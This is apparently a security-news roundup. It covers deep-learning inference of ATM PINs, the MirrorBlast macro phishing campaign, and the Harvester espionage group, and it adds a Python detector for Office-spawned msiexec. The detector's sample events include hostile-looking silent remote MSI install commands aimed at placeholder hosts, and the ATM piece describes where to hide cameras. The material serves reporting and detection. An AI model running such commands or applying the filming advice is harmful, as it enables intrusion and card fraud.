Using footage of people entering PINs on the replica pad, the model is trained to detect key presses and assign probabilities to a set of candidate PINs. For the study, the researchers collected 5,800 recordings of 58 people from various demographics entering 4-digit and 5-digit PINs.

The model was trained and run on a Xeon E5-2670 with 128 GB of RAM and three Tesla K20m GPUs with 5 GB of memory each: not a typical desktop, but within a reasonable budget for an attacker.

The researchers reconstructed the correct sequence for 5-digit PINs 30 percent of the time within three tries, which is usually the maximum number of attempts allowed before the card is blocked, and 41 percent of the time for 4-digit PINs.

The model can rule out keys hidden under the covering hand and infer the pressed digits from the movements of the typing hand, using the topological distance between keys.

Camera placement is critical, particularly for filming left- versus right-handed users. The researchers concluded that a pinhole camera hidden at the top of the ATM was the best choice. If the camera also captures audio, the model can use the keypad's press feedback sounds, which differ slightly for each key, to make its estimates considerably more precise.

This experiment demonstrates that covering the keypad with the other hand is insufficient protection against deep learning-based attacks, but there are several countermeasures.

For instance, if the bank allows a 5-digit PIN rather than a 4-digit one, choose the longer one. It is harder to remember, but it is far more resistant to this kind of attack. The proportion of the keypad covered by the hand also matters a great deal: 75% coverage yields a per-attempt accuracy of 0.55, whereas full (100%) coverage brings it down to 0.33.

Another alternative would be to provide customers with a virtual and randomized keypad rather than the conventional mechanical one. This has unavoidable usability problems, but it is a great security precaution.

This New Phishing Attack Uses a Weaponized Excel File


A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, as the campaign is known, was first spotted in early September by security firm ET Labs. Morphisec, another security firm, has since analysed the malware and warns that the malicious Excel files may slip past malware-detection systems because of their "extremely lightweight" embedded macros, making the campaign especially risky for businesses that rely on detection-based protection and sandboxing.

Macros, scripts that automate tasks inside Office documents, have long been popular with cybercriminals. Although macros are disabled by default in Excel, attackers use social engineering to trick victims into enabling them. Simple as the approach appears, state-sponsored groups also rely on macros because they frequently work.

Earlier this year Microsoft extended its Antimalware Scan Interface (AMSI) for antivirus engines to combat the rise in macro malware, including the recent trend of attackers using legacy Excel 4.0 XLM macros (rather than the newer VBA macros) to evade anti-malware products.

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

The MirrorBlast attack begins with a document attached to an email; later waves instead use a Google feeds proxy URL with a SharePoint or OneDrive lure posing as a file-sharing request. When the user clicks the link, they are sent to a compromised SharePoint site or a fake OneDrive site, both of which lead to the malicious Excel document.

The sample MirrorBlast email shows the attackers capitalising on company announcements about COVID-related changes to working arrangements. Morphisec notes that, because of compatibility issues with ActiveX components, the macro code only runs on 32-bit versions of Office. The macro runs a JavaScript script that tries to evade sandboxes by checking whether it is running with administrator privileges. It then launches the msiexec.exe process, which downloads and installs an MSI package.

Morphisec found two MSI installer variants, which use the legitimate scripting tools KiXtart and REBOL. The KiXtart script sends information about the victim's machine to the attackers' command-and-control server, including the domain, computer name, user name, and process list. The server replies with a number indicating whether the Rebol variant should be used. Morphisec says the Rebol script leads to the FlawedGrace remote access tool, which the group has used before.
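The chain described in the two preceding paragraphs, Excel spawning msiexec.exe to fetch an MSI from a remote URL, leaves a distinctive process-creation event, and Office legitimately launching the Windows Installer against an http(s) source is rare enough to alert on. The following is an added example, not Morphisec's or Proofpoint's detection content: the events are constructed to mirror Sysmon-style process-creation fields (Image, ParentImage, CommandLine), and the hostnames, paths and URL are placeholders.

```python
"""Detect msiexec.exe launched by an Office process or installing from a remote URL.

Added example, not Morphisec's or Proofpoint's code. Events are constructed.
"""
import re
from typing import Dict, List

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_SOURCE_RE = re.compile(r"https?://", re.IGNORECASE)
QUIET_FLAG_RE = re.compile(r"(?:^|\s)/(?:q[nb]?|quiet)(?:\s|$)", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev: Dict[str, str]) -> Dict[str, bool]:
    """Return the indicators present in one process-creation event."""
    flags = {"office_parent": False, "x86_office": False, "remote_source": False, "quiet_install": False}
    if _basename(ev.get("Image", "")) != "msiexec.exe":
        return flags
    parent_path = ev.get("ParentImage", "")
    parent = _basename(parent_path)
    cmd = ev.get("CommandLine", "")
    flags["office_parent"] = parent in OFFICE_IMAGES
    # The report says the macro only runs in 32-bit Office; on 64-bit Windows that lives
    # under "Program Files (x86)". Context for the analyst, not a condition for alerting.
    flags["x86_office"] = flags["office_parent"] and "(x86)" in parent_path.lower()
    flags["remote_source"] = bool(REMOTE_SOURCE_RE.search(cmd))
    flags["quiet_install"] = bool(QUIET_FLAG_RE.search(cmd))
    return flags


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Alert when msiexec is launched by Office, or installs from a remote URL from any parent.
    A silent-install flag alone is normal for software deployment and does not alert."""
    alerts: List[Dict[str, object]] = []
    for ev in events:
        flags = classify_event(ev)
        if flags["office_parent"] or flags["remote_source"]:
            alerts.append({"host": ev.get("Computer", "?"),
                           "indicators": [k for k, v in flags.items() if v]})
    return alerts


# Constructed events; hostnames, paths and the URL are placeholders.
EVENTS = [
    {   # the MirrorBlast-style chain: 32-bit Excel -> msiexec -> remote MSI, silent
        "Computer": "FIN-WS-042",
        "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\SysWOW64\msiexec.exe",
        "CommandLine": r"msiexec.exe /i http://203.0.113.7/share/update.msi /qn",
    },
    {   # an administrator installing a local package from Explorer: benign
        "Computer": "FIN-WS-042",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\Temp\vendor-tool.msi",
    },
    {   # Excel starting normally: not msiexec, ignored
        "Computer": "FIN-WS-043",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r'"EXCEL.EXE" C:\Temp\report.xlsx',
    },
    {   # remote MSI from PowerShell: no Office parent, still worth a look
        "Computer": "FIN-WS-044",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r"msiexec /i https://files.example.invalid/agent.msi /quiet",
    },
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The same logic translates directly into a Sigma rule keyed on Image, ParentImage and CommandLine; the Python form is here so the conditions can be exercised against sample events before deployment.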

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 

State-Backed Harvester Group is Going After Telecommunications Providers


Researchers have discovered a previously unknown state-sponsored actor conducting cyberattacks against South Asian telecommunications companies, IT firms, and government organizations using a unique combination of custom and publicly available tools. The group's goal appears to be data collection through highly targeted espionage. Harvester is a new threat actor with no known links to existing groups, as its custom tools had never before been seen in the wild.

"The Harvester group uses both custom malware and publicly available tools in its attacks, which began in June 2021, with the most recent activity seen in October 2021. Sectors targeted include telecommunications, government, and information technology (IT)," Symantec researchers said. "The capabilities of the tools, their custom development, and the victims targeted, all suggest that Harvester is a nation-state-backed actor."

The attackers' toolset consists of a custom backdoor, which Symantec calls Graphon, along with Metasploit, a custom downloader, a custom screenshotter, and Cobalt Strike Beacon. Although Symantec researchers were unable to determine the initial attack vector, they found evidence that a malicious URL was used for that purpose.

The Graphon backdoor gives the attackers remote access to the network and hides its presence by blending command-and-control (C2) traffic with legitimate traffic to CloudFront and Microsoft infrastructure. The custom downloader creates the files it needs on the system, adds a registry value for a new load point, and opens an embedded web browser at hxxps:/usedust[.]com.

Although this looks like the location from which the backdoor is fetched, the actors use the URL only as a decoy to create confusion; Graphon is not actually retrieved from that address. The custom screenshotter captures the desktop and saves the images to password-protected ZIP archives, which Graphon then exfiltrates. Each ZIP file is kept for a week before being deleted automatically.

While there is not enough evidence to tie Harvester's activity to a single nation-state, the group's use of custom backdoors, its intensive efforts to conceal its activity, and its targeting all point to a state-sponsored actor, according to Symantec researchers. Given the recent upheaval in Afghanistan, the campaign's targeting of organizations in that country is also notable. Harvester's activity makes it clear that the goal of this campaign is espionage, a common motive for nation-state-backed operations, the researchers added.